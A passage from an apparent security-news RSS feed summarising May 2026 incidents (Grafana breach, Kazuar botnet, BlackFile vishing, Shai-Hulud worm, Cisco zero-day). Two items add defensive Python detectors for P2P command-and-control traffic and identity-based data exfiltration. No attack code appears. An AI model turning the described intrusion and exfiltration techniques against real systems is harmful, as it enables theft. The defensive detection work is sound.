&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Adversary, High Severity, Credential Theft, Supply Chain Compromise&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: The Hacker News | &lt;a href=&quot;https://thehackernews.com/2026/05/developer-workstations-are-now-part-of.html&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Mon, 18 May 2026 11:23:41 GMT</pubDate>
      <dc:creator>info@thehackernews.com (The Hacker News)</dc:creator>
      <source url="https://thehackernews.com/2026/05/developer-workstations-are-now-part-of.html">The Hacker News</source>
      <category>Adversary</category>
      <category>Credential Theft</category>
      <category>Supply Chain Compromise</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>Grafana Confirms Breach After Hackers Claim They Stole Data</title>
      <link>https://brewedintel.io/articles/44d2770d-b4f3-431c-ac48-2da18e1a7bd4</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/44d2770d-b4f3-431c-ac48-2da18e1a7bd4</guid>
      <description>Grafana confirmed a data breach perpetrated by the cybercrime group Coinbase Cartel, which is linked to notable actors ShinyHunters, Scattered Spider, and Lapsus$. The attackers claimed to have stolen data, and Grafana acknowledged the incident. The breach exposes sensitive internal information, potentially impacting customers and operations. Immediate investigation and remediation are crucial to mitigate further damage. Organizations should review their security posture and monitor for any leaked data or related phishing attempts.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;Grafana confirmed a data breach perpetrated by the cybercrime group Coinbase Cartel, which is linked to notable actors ShinyHunters, Scattered Spider, and Lapsus$. The attackers claimed to have stolen data, and Grafana acknowledged the incident. The breach exposes sensitive internal information, potentially impacting customers and operations. Immediate investigation and remediation are crucial to mitigate further damage. Organizations should review their security posture and monitor for any leaked data or related phishing attempts.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;This breach indicates that threat actors, some with high-profile connections, successfully exfiltrated data from a major analytics platform, exposing sensitive corporate information that could be used for further attacks or extortion.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Immediately assess any connections to Grafana services, rotate secrets and credentials that may be exposed, and enhance monitoring for suspicious activity involving Grafana-related systems and data.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Incident, High Severity, Data Breach, Data Theft&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: SecurityWeek | &lt;a href=&quot;https://www.securityweek.com/grafana-confirms-breach-after-hackers-claim-they-stole-data/&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Mon, 18 May 2026 08:34:59 GMT</pubDate>
      <dc:creator>Eduard Kovacs</dc:creator>
      <source url="https://www.securityweek.com/grafana-confirms-breach-after-hackers-claim-they-stole-data/">SecurityWeek</source>
      <category>Incident</category>
      <category>Data Breach</category>
      <category>Data Theft</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>Russian hackers turn Kazuar backdoor into modular P2P botnet</title>
      <link>https://brewedintel.io/articles/f709f700-ee7b-48a4-9be4-26e8a958c0c7</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/f709f700-ee7b-48a4-9be4-26e8a958c0c7</guid>
      <description>The Russian state-sponsored group Secret Blizzard has upgraded its Kazuar backdoor into a modular peer-to-peer (P2P) botnet, enhancing stealth, persistence, and data collection capabilities. This evolution allows the malware to operate resiliently by avoiding centralized control, making takedown more difficult. The threat primarily targets high-value entities in government, defense, and technology sectors, exfiltrating sensitive information over extended periods.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;The Russian state-sponsored group Secret Blizzard has upgraded its Kazuar backdoor into a modular peer-to-peer (P2P) botnet, enhancing stealth, persistence, and data collection capabilities. This evolution allows the malware to operate resiliently by avoiding centralized control, making takedown more difficult. The threat primarily targets high-value entities in government, defense, and technology sectors, exfiltrating sensitive information over extended periods.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;Secret Blizzard&amp;#x27;s updated Kazuar botnet represents a sophisticated, persistent threat that can evade detection and maintain long-term access within networks, posing significant risk to sensitive data and national security.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Implement network segmentation and monitor for P2P communication patterns, deploy endpoint detection and response (EDR) solutions with behavioral analytics, and conduct regular threat hunting for signs of Kazuar activity.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Malware, High Severity, Backdoor, Botnet&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Bleeping Computer | &lt;a href=&quot;https://www.bleepingcomputer.com/news/security/russian-hackers-turn-kazuar-backdoor-into-modular-p2p-botnet/&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Sat, 16 May 2026 14:15:37 GMT</pubDate>
      <dc:creator>Bill Toulas</dc:creator>
      <source url="https://www.bleepingcomputer.com/news/security/russian-hackers-turn-kazuar-backdoor-into-modular-p2p-botnet/">Bleeping Computer</source>
      <category>Malware</category>
      <category>Backdoor</category>
      <category>Botnet</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>Turla Turns Kazuar Backdoor Into Modular P2P Botnet for Persistent Access</title>
      <link>https://brewedintel.io/articles/810146a0-bfa7-44dc-9186-a2d3c6fa3146</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/810146a0-bfa7-44dc-9186-a2d3c6fa3146</guid>
      <description>The Russian state-sponsored APT group Turla has updated its Kazuar backdoor into a modular peer-to-peer (P2P) botnet designed for stealth and persistent access to compromised hosts. Attributed to FSB Center 16 by CISA, this evolution enables robust command and control resilience, hindering takedown efforts. The P2P architecture reduces reliance on centralized infrastructure, complicating detection and mitigation. Organizations, especially those in government and defense sectors, are at risk from this advanced persistent threat.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;The Russian state-sponsored APT group Turla has updated its Kazuar backdoor into a modular peer-to-peer (P2P) botnet designed for stealth and persistent access to compromised hosts. Attributed to FSB Center 16 by CISA, this evolution enables robust command and control resilience, hindering takedown efforts. The P2P architecture reduces reliance on centralized infrastructure, complicating detection and mitigation. Organizations, especially those in government and defense sectors, are at risk from this advanced persistent threat.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;Turla&amp;#x27;s Kazuar P2P botnet poses a high risk due to its stealthy, persistent access capabilities, enabling long-term espionage and data theft by a sophisticated state actor.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Implement network segmentation, monitor for anomalous P2P traffic, and deploy endpoint detection solutions focused on behavioral indicators of Kazuar and similar backdoors.&lt;/p&gt;
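&lt;p&gt;To make the P2P-monitoring advice in this item and in the Bleeping Computer item above concrete, here is an added example (not code from either article, and not a signature for Kazuar itself) that scores flow records for a peer-to-peer pattern: one internal host talking to many distinct external peers on the same port with roughly balanced byte counts in each direction, which is how mesh command-and-control differs from ordinary client traffic that fans out little and downloads far more than it uploads. The flow records, the internal address ranges, the thresholds and the flagged host are all constructed for this example; the external addresses come from the IETF documentation ranges.&lt;/p&gt;

```python
"""Flag internal hosts whose flows look like a peer-to-peer mesh.

Added example, not from either article. Flow records, internal ranges and
thresholds are constructed; real input would be NetFlow/IPFIX or Zeek conn.log.
"""
from collections import defaultdict
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

# Organisation-defined internal ranges (assumption). Python's is_private would also
# treat the documentation ranges used below as private, so membership is explicit.
INTERNAL_NETS = [ip_network("10.0.0.0/8"), ip_network("172.16.0.0/12"), ip_network("192.168.0.0/16")]

MIN_PEERS = 8          # distinct external peers on one port before a host is suspicious
MAX_ASYMMETRY = 3.0    # larger/smaller byte direction; mesh control traffic is balanced
WINDOW_SECONDS = 3600  # flows are aggregated per (host, port) from the first flow seen


@dataclass(frozen=True)
class Flow:
    ts: int        # epoch seconds
    src: str
    dst: str
    dport: int
    bytes_out: int
    bytes_in: int


@dataclass(frozen=True)
class Candidate:
    host: str
    dport: int
    peer_count: int
    asymmetry: float


def is_internal(ip: str) -> bool:
    addr = ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def asymmetry(bytes_out: int, bytes_in: int) -> float:
    """Ratio of the larger direction to the smaller; 1.0 means perfectly balanced."""
    lo, hi = sorted((bytes_out, bytes_in))
    return float("inf") if lo == 0 else hi / lo


def find_p2p_candidates(flows: list[Flow]) -> list[Candidate]:
    peers = defaultdict(set)
    volume = defaultdict(lambda: [0, 0])
    first_seen = {}
    for f in sorted(flows, key=lambda f: f.ts):
        if not is_internal(f.src) or is_internal(f.dst):
            continue  # only internal-to-external flows are interesting here
        key = (f.src, f.dport)
        start = first_seen.setdefault(key, f.ts)
        if f.ts - start > WINDOW_SECONDS:
            continue
        peers[key].add(f.dst)
        volume[key][0] += f.bytes_out
        volume[key][1] += f.bytes_in
    candidates = []
    for (host, dport), peer_set in peers.items():
        if len(peer_set) >= MIN_PEERS:
            ratio = asymmetry(*volume[(host, dport)])
            if not ratio > MAX_ASYMMETRY:
                candidates.append(Candidate(host, dport, len(peer_set), round(ratio, 2)))
    return candidates


def _constructed_flows() -> list[Flow]:
    flows = []
    # Host A: 12 external peers on 8443, small balanced exchanges (mesh-like).
    for i in range(12):
        flows.append(Flow(1000 + 60 * i, "10.0.0.5", f"198.51.100.{10 + i}", 8443, 1200 + 10 * i, 1100 + 7 * i))
    # Host B: 3 peers on 443, heavily download-skewed (ordinary browsing or updates).
    for i in range(3):
        flows.append(Flow(2000 + 30 * i, "10.0.0.7", f"203.0.113.{20 + i}", 443, 400, 50000))
    # Host C: many peers on 443 but strongly asymmetric, so the balance check clears it.
    for i in range(10):
        flows.append(Flow(3000 + 10 * i, "10.0.0.9", f"203.0.113.{100 + i}", 443, 2000, 150000))
    return flows


SAMPLE_FLOWS = _constructed_flows()

if __name__ == "__main__":
    for c in find_p2p_candidates(SAMPLE_FLOWS):
        print(c)
```

&lt;p&gt;Only host 10.0.0.5 survives both filters. In production, join the candidates against the asset inventory first (a legitimate CDN node or BitTorrent client will trip this too) and treat a hit as a lead for endpoint triage rather than as a verdict.&lt;/p&gt;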
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Malware, High Severity, Backdoor, Botnet, Persistent Access&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: The Hacker News | &lt;a href=&quot;https://thehackernews.com/2026/05/turla-turns-kazuar-backdoor-into.html&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Fri, 15 May 2026 17:10:25 GMT</pubDate>
      <dc:creator>info@thehackernews.com (The Hacker News)</dc:creator>
      <source url="https://thehackernews.com/2026/05/turla-turns-kazuar-backdoor-into.html">The Hacker News</source>
      <category>Malware</category>
      <category>Backdoor</category>
      <category>Botnet</category>
      <category>Persistent Access</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>In Other News: Big Tech vs Canada Encryption Bill, Cisco’s Free AI Security Spec, Audi App Flaws</title>
      <link>https://brewedintel.io/articles/efbfb59c-55bf-4800-aba3-db516b036a75</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/efbfb59c-55bf-4800-aba3-db516b036a75</guid>
      <description>This article covers multiple security stories including a data breach at Nvidia&#x27;s cloud gaming service, Android 17 security upgrades, and an FBI warning about ShinyHunters compromising the Canvas platform. It also mentions vulnerabilities in the Audi app. The incidents highlight risks to user data and system integrity. Users and organizations should apply security patches and monitor for suspicious activity associated with ShinyHunters.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;This article covers multiple security stories including a data breach at Nvidia&amp;#x27;s cloud gaming service, Android 17 security upgrades, and an FBI warning about ShinyHunters compromising the Canvas platform. It also mentions vulnerabilities in the Audi app. The incidents highlight risks to user data and system integrity. Users and organizations should apply security patches and monitor for suspicious activity associated with ShinyHunters.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Vulnerability, Medium Severity, Data Breach, Vulnerability Exploitation&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: SecurityWeek | &lt;a href=&quot;https://www.securityweek.com/in-other-news-big-tech-vs-canada-encryption-bill-ciscos-free-ai-security-spec-audi-app-flaws/&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Fri, 15 May 2026 14:52:16 GMT</pubDate>
      <dc:creator>SecurityWeek News</dc:creator>
      <source url="https://www.securityweek.com/in-other-news-big-tech-vs-canada-encryption-bill-ciscos-free-ai-security-spec-audi-app-flaws/">SecurityWeek</source>
      <category>Vulnerability</category>
      <category>Data Breach</category>
      <category>Vulnerability Exploitation</category>
      <category>Medium Severity</category>
    </item>
    <item>
      <title>Welcome to BlackFile: Inside a Vishing Extortion Operation</title>
      <link>https://brewedintel.io/articles/a64bd3ab-76eb-418e-96aa-993e56b24e76</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/a64bd3ab-76eb-418e-96aa-993e56b24e76</guid>
      <description>Google Threat Intelligence Group reports that UNC6671, operating under the &quot;BlackFile&quot; brand, executes a highly coordinated extortion campaign leveraging voice phishing (vishing) and adversary-in-the-middle techniques to compromise cloud identities. Targeting Microsoft 365 and Okta environments, the group bypasses traditional perimeter controls and multi-factor authentication to establish persistent access. Using automated scripts, attackers programmatically exfiltrate sensitive corporate data from SharePoint, OneDrive, and CRM systems at scale. Despite recently retiring the BlackFile data leak site and declaring a shutdown under this name, the threat cluster&#x27;s techniques remain active and representative of a broader shift toward identity-centric data theft. Organizations must prioritize phishing-resistant MFA, monitor identity provider logs for anomalous authentication flows, and enforce strict auditing on high-volume SaaS API access to detect and prevent unauthorized data extraction.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;Google Threat Intelligence Group reports that UNC6671, operating under the &amp;quot;BlackFile&amp;quot; brand, executes a highly coordinated extortion campaign leveraging voice phishing (vishing) and adversary-in-the-middle techniques to compromise cloud identities. Targeting Microsoft 365 and Okta environments, the group bypasses traditional perimeter controls and multi-factor authentication to establish persistent access. Using automated scripts, attackers programmatically exfiltrate sensitive corporate data from SharePoint, OneDrive, and CRM systems at scale. Despite recently retiring the BlackFile data leak site and declaring a shutdown under this name, the threat cluster&amp;#x27;s techniques remain active and representative of a broader shift toward identity-centric data theft. Organizations must prioritize phishing-resistant MFA, monitor identity provider logs for anomalous authentication flows, and enforce strict auditing on high-volume SaaS API access to detect and prevent unauthorized data extraction.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;Extortion groups like UNC6671 exploit identity-based attacks to bypass traditional security perimeters, leading to large-scale data theft and significant financial and reputational damage.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Deploy phishing-resistant MFA, monitor identity provider logs for unauthorized authentication flows, and audit high-volume SaaS API access to detect automated data exfiltration early.&lt;/p&gt;
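&lt;p&gt;An added example (not code from Google Threat Intelligence Group or from any IdP or SaaS vendor) joining the two monitoring steps above into one detection: a successful MFA sign-in from an IP the user has never used, followed within minutes by a download burst from that same IP, which is the shape of an adversary-in-the-middle session being driven by an exfiltration script. The event schema (user, kind, ip, result, mfa), the per-user known-IP baseline, the 15-minute window and the 50-download threshold are assumptions, and the events are constructed; the same correlation applies to the 7-Eleven Salesforce items earlier in this feed with bulk record exports in place of downloads.&lt;/p&gt;

```python
"""Correlate suspicious identity-provider sign-ins with bulk SaaS downloads.

Added example, not from the article. The event fields are a neutral assumption,
not the schema of any particular IdP or SaaS audit log; all events are constructed.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Event:
    ts: int            # epoch seconds
    user: str
    kind: str          # "signin" or "download"
    ip: str
    result: str = "success"
    mfa: bool = False  # True when the sign-in satisfied an MFA challenge


@dataclass(frozen=True)
class Alert:
    user: str
    ip: str
    signin_ts: int
    downloads: int


EXFIL_WINDOW = 15 * 60   # seconds after the sign-in in which downloads are counted
DOWNLOAD_THRESHOLD = 50  # downloads in the window that look scripted rather than human


def detect_identity_exfil(events: list[Event], known_ips: dict[str, set]) -> list[Alert]:
    """Flag MFA sign-ins from an IP the user has never used that are followed by a
    download burst from that same IP. New-device logins alone are noisy; the burst
    is what makes the pair actionable."""
    by_user = defaultdict(list)
    for e in sorted(events, key=lambda e: e.ts):
        by_user[e.user].append(e)
    alerts = []
    for user, evs in by_user.items():
        for i, e in enumerate(evs):
            if e.kind != "signin" or e.result != "success" or not e.mfa:
                continue
            if e.ip in known_ips.get(user, set()):
                continue
            count = 0
            for later in evs[i + 1:]:
                if later.ts - e.ts > EXFIL_WINDOW:
                    break  # events are time-sorted, nothing later can be in the window
                if later.kind == "download" and later.ip == e.ip:
                    count += 1
            if count >= DOWNLOAD_THRESHOLD:
                alerts.append(Alert(user, e.ip, e.ts, count))
    return alerts


def _constructed_events() -> list[Event]:
    events = [
        # alice: password-only failure, then an MFA success from an IP never seen before
        Event(900, "alice", "signin", "198.51.100.77", result="failure"),
        Event(1000, "alice", "signin", "198.51.100.77", mfa=True),
        # bob: MFA success from his usual IP and a handful of downloads
        Event(2000, "bob", "signin", "203.0.113.10", mfa=True),
        # carol: new IP but only a few downloads, below the scripted threshold
        Event(3000, "carol", "signin", "198.51.100.9", mfa=True),
    ]
    events += [Event(1000 + 5 * i, "alice", "download", "198.51.100.77") for i in range(1, 61)]
    events += [Event(2000 + 60 * i, "bob", "download", "203.0.113.10") for i in range(1, 6)]
    events += [Event(3000 + 60 * i, "carol", "download", "198.51.100.9") for i in range(1, 4)]
    return events


# Per-user baseline of IPs seen in, say, the previous 30 days (constructed).
KNOWN_IPS = {"alice": {"203.0.113.5"}, "bob": {"203.0.113.10"}, "carol": {"203.0.113.7"}}
SAMPLE_EVENTS = _constructed_events()

if __name__ == "__main__":
    for a in detect_identity_exfil(SAMPLE_EVENTS, KNOWN_IPS):
        print(a)
```

&lt;p&gt;Only alice is reported. The baseline should be keyed on whatever the IdP exposes for device or network identity (ASN, device ID or token binding where available) rather than raw IP alone, and the response to a hit is to revoke the session and refresh tokens, not just to reset the password, because an AitM session survives a password change.&lt;/p&gt;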
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Vulnerability, High Severity, Cloud Infrastructure Compromise, Extortion, Identity Theft&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Mandiant Frontline Blog | &lt;a href=&quot;https://cloud.google.com/blog/topics/threat-intelligence/blackfile-vishing-extortion-operation/&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Fri, 15 May 2026 14:00:00 GMT</pubDate>
      <dc:creator>Google Threat Intelligence Group</dc:creator>
      <source url="https://cloud.google.com/blog/topics/threat-intelligence/blackfile-vishing-extortion-operation/">Mandiant Frontline Blog</source>
      <category>Vulnerability</category>
      <category>Cloud Infrastructure Compromise</category>
      <category>Extortion</category>
      <category>Identity Theft</category>
      <category>Vishing</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>The Good, the Bad and the Ugly in Cybersecurity – Week 20</title>
      <link>https://brewedintel.io/articles/3739d632-8e56-497c-8903-e7b84999352a</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/3739d632-8e56-497c-8903-e7b84999352a</guid>
      <description>This week&#x27;s cybersecurity highlights include the takedown of dark web markets Crimenetwork and Dream Market by European and US authorities. In a major incident, threat group ShinyHunters exploited multiple XSS flaws in Instructure&#x27;s Canvas LMS, exfiltrating 3.6TB of data containing 280 million records from nearly 8,900 educational institutions. They defaced login portals during finals, demanding ransom. Additionally, Google TAG reports threat actors using AI to discover and weaponize zero-day vulnerabilities, with state-sponsored groups from China, North Korea, and Russia leveraging LLMs for exploit development and obfuscation. This AI-driven acceleration compresses patch windows from weeks to hours, demanding urgent defensive adaptation.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;This week&amp;#x27;s cybersecurity highlights include the takedown of dark web markets Crimenetwork and Dream Market by European and US authorities. In a major incident, threat group ShinyHunters exploited multiple XSS flaws in Instructure&amp;#x27;s Canvas LMS, exfiltrating 3.6TB of data containing 280 million records from nearly 8,900 educational institutions. They defaced login portals during finals, demanding ransom. Additionally, Google TAG reports threat actors using AI to discover and weaponize zero-day vulnerabilities, with state-sponsored groups from China, North Korea, and Russia leveraging LLMs for exploit development and obfuscation. This AI-driven acceleration compresses patch windows from weeks to hours, demanding urgent defensive adaptation.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;The AI-assisted zero-day discovery and massive Canvas breach demonstrate that attackers are rapidly advancing, exposing sensitive data and shortening patch timelines, leaving organizations vulnerable if they do not adapt.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Accelerate patch management, put web application firewalls in front of exposed applications, and monitor for anomalous session activity. Harden session handling (HttpOnly and SameSite cookie attributes, short session lifetimes, re-authentication for sensitive actions), since multi-factor authentication alone does not stop a session token stolen through XSS, and educate users on AI-driven social engineering.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Malware, Critical Severity, Data Breach, Extortion, Ransomware&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: SentinelOne | &lt;a href=&quot;https://www.sentinelone.com/blog/the-good-the-bad-and-the-ugly-in-cybersecurity-week-20-7/&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Fri, 15 May 2026 13:00:14 GMT</pubDate>
      <dc:creator>SentinelOne</dc:creator>
      <source url="https://www.sentinelone.com/blog/the-good-the-bad-and-the-ugly-in-cybersecurity-week-20-7/">SentinelOne</source>
      <category>Malware</category>
      <category>Data Breach</category>
      <category>Extortion</category>
      <category>Ransomware</category>
      <category>Critical Severity</category>
    </item>
    <item>
      <title>TeamPCP Ups the Game, Releases Shai-Hulud Worm’s Source Code</title>
      <link>https://brewedintel.io/articles/9da1a519-9910-49b4-9271-5a16b3faa54e</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/9da1a519-9910-49b4-9271-5a16b3faa54e</guid>
      <description>TeamPCP, a hacking group, has released the source code for the Shai-Hulud worm, encouraging its use in supply chain attacks and offering monetary rewards. This worm, now publicly available, poses a significant threat to organizations by enabling worm-based attacks that can spread through software supply chains. The release lowers the barrier for less skilled attackers, potentially increasing the frequency of supply chain compromises. Organizations should assess their supply chain risks, monitor for indicators of compromise associated with Shai-Hulud, and implement robust security controls to defend against worm propagation and payload delivery.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;TeamPCP, a hacking group, has released the source code for the Shai-Hulud worm, encouraging its use in supply chain attacks and offering monetary rewards. This worm, now publicly available, poses a significant threat to organizations by enabling worm-based attacks that can spread through software supply chains. The release lowers the barrier for less skilled attackers, potentially increasing the frequency of supply chain compromises. Organizations should assess their supply chain risks, monitor for indicators of compromise associated with Shai-Hulud, and implement robust security controls to defend against worm propagation and payload delivery.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;The public release of Shai-Hulud worm source code enables widespread supply chain attacks, threatening organizational integrity and trust with potential for significant operational and reputational damage.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Enhance supply chain security by validating software integrity, segmenting networks to limit worm propagation, and deploying advanced threat detection for anomalous worm-like behaviors.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Malware, High Severity, Supply Chain Attack, Worm&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: SecurityWeek | &lt;a href=&quot;https://www.securityweek.com/teampcp-ups-the-game-releases-shai-hulud-worms-source-code/&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Fri, 15 May 2026 09:47:09 GMT</pubDate>
      <dc:creator>Ionut Arghire</dc:creator>
      <source url="https://www.securityweek.com/teampcp-ups-the-game-releases-shai-hulud-worms-source-code/">SecurityWeek</source>
      <category>Malware</category>
      <category>Supply Chain Attack</category>
      <category>Worm</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>Cisco Patches Another SD-WAN Zero-Day, the Sixth Exploited in 2026</title>
      <link>https://brewedintel.io/articles/d1ba6be7-7f57-4823-8b73-25f4cda89c68</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/d1ba6be7-7f57-4823-8b73-25f4cda89c68</guid>
      <description>Cisco has patched another zero-day vulnerability (CVE-2026-20182) in its SD-WAN solution, which has been exploited in targeted attacks by the sophisticated threat actor UAT-8616. This marks the sixth such zero-day in Cisco SD-WAN exploited in 2026, indicating persistent and focused adversarial interest in these devices. The vulnerability, if unpatched, can provide initial access to network infrastructure, potentially leading to broader compromise. Organizations using Cisco SD-WAN should treat this as high priority and apply the available patch immediately to mitigate risk.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;Cisco has patched another zero-day vulnerability (CVE-2026-20182) in its SD-WAN solution, which has been exploited in targeted attacks by the sophisticated threat actor UAT-8616. This marks the sixth such zero-day in Cisco SD-WAN exploited in 2026, indicating persistent and focused adversarial interest in these devices. The vulnerability, if unpatched, can provide initial access to network infrastructure, potentially leading to broader compromise. Organizations using Cisco SD-WAN should treat this as high priority and apply the available patch immediately to mitigate risk.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;Cisco SD-WAN devices often serve as critical network choke points; exploitation can allow attackers to pivot into internal networks and cause major disruption.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Apply the security update provided in Cisco&amp;#x27;s advisory as soon as possible. Additionally, review device logs for any signs of prior exploitation and monitor network traffic for unusual patterns.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Vulnerability, Critical Severity, Zero-Day Exploit&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: SecurityWeek | &lt;a href=&quot;https://www.securityweek.com/cisco-patches-another-sd-wan-zero-day-the-sixth-exploited-in-2026/&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Fri, 15 May 2026 06:28:46 GMT</pubDate>
      <dc:creator>Eduard Kovacs</dc:creator>
      <source url="https://www.securityweek.com/cisco-patches-another-sd-wan-zero-day-the-sixth-exploited-in-2026/">SecurityWeek</source>
      <category>Vulnerability</category>
      <category>Zero-Day Exploit</category>
      <category>Critical Severity</category>
    </item>
    <item>
      <title>April 2026 CVE Landscape</title>
      <link>https://brewedintel.io/articles/7d57fb19-cb7b-4909-b9db-6b4ace47cdb6</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/7d57fb19-cb7b-4909-b9db-6b4ace47cdb6</guid>
      <description>In April 2026, Insikt Group identified 37 high-impact vulnerabilities, a 19% increase from March, with 35 rated very critical. 31 were in CISA&#x27;s KEV catalog. Six CVEs were uncovered via honeypots. Notably, seven vulnerabilities were linked to ransomware, including six exploited by Storm-1175&#x27;s Medusa ransomware and CVE-2026-41940 associated with Sorry Ransomware. CVE-2024-3721 was used to deliver the Nexcorium botnet. 16 of the 37 vulnerabilities allowed remote code execution, affecting 12 vendors. Public PoCs were available for 24. The fastest exploitation occurred within two days of disclosure. Organizations must prioritize patching these exploited vulnerabilities, especially those tied to ransomware, and monitor for related indicators.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;In April 2026, Insikt Group identified 37 high-impact vulnerabilities, a 19% increase from March, with 35 rated very critical. 31 were in CISA&amp;#x27;s KEV catalog. Six CVEs were uncovered via honeypots. Notably, seven vulnerabilities were linked to ransomware, including six exploited by Storm-1175&amp;#x27;s Medusa ransomware and CVE-2026-41940 associated with Sorry Ransomware. CVE-2024-3721 was used to deliver the Nexcorium botnet. 16 of the 37 vulnerabilities allowed remote code execution, affecting 12 vendors. Public PoCs were available for 24. The fastest exploitation occurred within two days of disclosure. Organizations must prioritize patching these exploited vulnerabilities, especially those tied to ransomware, and monitor for related indicators.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;With 37 actively exploited vulnerabilities, including ransomware-linked exploits and a botnet delivery campaign, organizations face immediate risk of compromise and data encryption.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Prioritize patching of these CVEs, especially those in CISA KEV and associated with ransomware groups, and implement detection rules for related IoCs and behaviors.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Vulnerability, Critical Severity, Botnet, Ransomware&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Recorded Future | &lt;a href=&quot;https://www.recordedfuture.com/blog/april-cve-landscape&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Fri, 15 May 2026 00:00:00 GMT</pubDate>
      <source url="https://www.recordedfuture.com/blog/april-cve-landscape">Recorded Future</source>
      <category>Vulnerability</category>
      <category>Botnet</category>
      <category>Ransomware</category>
      <category>Critical Severity</category>
    </item>
    <item>
      <title>TeamPCP hackers advertise Mistral AI code repos for sale</title>
